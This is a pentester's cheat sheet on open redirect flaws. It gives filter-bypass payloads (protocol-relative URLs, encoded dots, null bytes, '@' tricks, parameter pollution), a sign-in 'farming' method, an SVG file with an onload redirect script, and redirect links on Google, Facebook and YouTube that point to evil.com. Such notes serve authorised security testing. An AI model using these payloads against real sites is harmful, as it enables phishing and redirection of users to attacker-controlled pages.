Open Redirect

Often a bug that brings impact when chained.

Using “https:” to bypass “//” blacklisted keyword

https:google.com

Using “//” to bypass “http” blacklisted keyword

//google.com

Using /\/ to bypass // blacklisted keyword

\/\/google.com/
/\/google.com/

Using “/" to bypass:

/\google.com

Using “%E3%80%82” to bypass “.” blacklisted character

//google%E3%80%82com

Using null byte “%00” to bypass blacklist filter

//google%00.com

Using parameter pollution

?next=whitelisted.com&next=google.com

Using “@” character, browser will redirect to anything after the “@”

http://[email protected]/

Helpdesk trick

Sometimes a website will redirect only to a helpdesk subdomain, this behavior is interesting because it is possible to create a custom subdomain a place a script that will redirect to an evil website. Making it a open redirect.

Open Redirect farming

If the Applictaion have a user Sign-In/Sign-Up feature, then register a user and log in as the user.
Go to your user profile page , for example : samplesite.me/accounts/profile
Copy the profile page’s URL
Logout and Clear all the cookies and go to the homepage of the site.
Paste the Copied Profile URL on the address bar
If the site prompts for a login , check the address bar , you may find the login page with a redirect parameter like the following

https://samplesite.me/login?next=accounts/profile

Exploit it or escalate to XSS

Open Redirect uploading svg files

<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.REMOVETHISlocation='http://www.example.com'"
xmlns="http://www.w3.org/2000/svg">
</svg>
</code>

Known Redirects

https://google.com/amp/s/evil.com https://meet.google.com/linkredirect?dest=http://evil.com https://www.google.com/search?btnI&q=http://www.evil.com https://www.facebook.com/l.php?u=http://evil.com https://www.youtube.com/redirect?q=http://evil.com https://docs.google.com/gview?url=https://evil.com

Tools

Oralyzer